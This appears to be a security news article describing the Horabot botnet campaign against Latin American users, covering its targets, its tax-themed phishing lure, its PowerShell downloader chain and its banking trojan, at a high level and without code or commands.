Horabot Malware

Spanish-speaking users in Latin America have been targeted by a newly discovered botnet malware known as Horabot. The attack campaign is believed to have been active since at least November 2020. The threatening program grants threat actors the ability to manipulate the victim's Outlook mailbox, extract email addresses from their contacts, and send phishing emails containing corrupted HTML attachments to all the addresses within the compromised mailbox.

In addition to these capabilities, the Horabot Malware deploys a Windows-based financial Trojan and a spam tool. These components are designed to harvest sensitive online banking credentials and compromise popular webmail services such as Gmail, Outlook and Yahoo! With access to these compromised accounts, the malware operators can unleash a torrent of spam emails to a wide range of recipients.

Cybercriminals Target Several Different Industries with the Horabot Malware

According to a cybersecurity firm, a significant number of infections related to the Horabot campaign have been detected in Mexico. At the same time, there have been fewer identified victims in countries such as Uruguay, Brazil, Venezuela, Argentina, Guatemala and Panama. The threat actor responsible for the campaign is believed to be based in Brazil.

The ongoing campaign targets users primarily involved in the accounting, construction and engineering, wholesale distribution, and investment sectors. However, it is suspected that other industries in the region may also be affected by this threat.

The Horabot Malware is Delivered via a Multi-Stage Attack Chain

The attack campaign begins with phishing emails that use tax-related themes to lure recipients into opening an HTML attachment. Within this attachment, a link is embedded, leading to a RAR archive.

Upon opening the file, a PowerShell downloader script is executed, which is responsible for retrieving a ZIP file containing the primary payloads from a remote server. Additionally, the machine is rebooted during this process.

The system restart serves as a launching point for the banking trojan and the spam tool, enabling the threat actor to collect data, record keystrokes, capture screenshots, and distribute further phishing emails to the contacts of the victim.

The banking Trojan used in the campaign is a 32-bit Windows DLL coded in the Delphi programming language. It exhibits similarities with other Brazilian malware families, such as Mekotio and Casbaneiro.

On the other hand, Horabot is a phishing botnet program designed for Outlook. It is written in PowerShell and possesses the capability to send phishing emails to all email addresses found in the victim's mailbox, thereby spreading the infection. This tactic is a deliberate strategy employed by the threat actor to reduce the risk of exposing their phishing infrastructure.